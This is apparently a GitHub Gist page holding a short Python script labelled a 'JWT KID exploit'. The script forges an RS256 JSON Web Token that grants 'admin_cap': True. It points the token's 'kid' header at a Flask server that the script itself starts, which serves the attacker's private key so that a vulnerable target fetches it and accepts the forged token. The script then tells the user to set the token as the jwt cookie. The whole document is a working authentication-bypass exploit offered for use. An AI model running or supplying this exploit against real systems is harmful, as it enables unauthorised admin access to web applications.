Created
July 7, 2021 23:40
-
-
Save Owez/3efc8f43167cda4cc6c61b9811a1d46f to your computer and use it in GitHub Desktop.
JWT KID exploit, ensure Flask (`flask`) and PyJWT (`pyjwt`) are installed before running
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """JWT KID exploit, ensure Flask (`flask`) and PyJWT (`pyjwt`) are installed before running""" | |
| import jwt | |
| from flask import Flask | |
| DEFAULT_PORT = 8000 | |
| DIV = "-" * 32 | |
| print(f"JWT KID exploit\n{DIV}") | |
| def get_port() -> int: | |
| found = input(f"Port ({DEFAULT_PORT}): ") | |
| return found if found else DEFAULT_PORT | |
| def get_key() -> str: | |
| with open(input("Path to RSA PRIVATE KEY: "), "r") as file: | |
| return file.read() | |
| app = Flask(__name__) | |
| hostname = input("Hostname/IP: ") | |
| port = get_port() | |
| key = get_key() | |
| token = jwt.encode( | |
| {"username": input("Username: "), "email": input("Email: "), "admin_cap": True}, | |
| key, | |
| "RS256", | |
| headers={"kid": f"http://{hostname}:{port}"}, | |
| ) | |
| @app.route("/") | |
| def index(): | |
| return key | |
| print( | |
| f"{DIV}\nToken generated successfully, please set this as your jwt cookie:\n\n{token}\n\nThe web server is all setup in this token and is running at http://127.0.0.1:{port}\n{DIV}" | |
| ) | |
| app.run(port=port) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment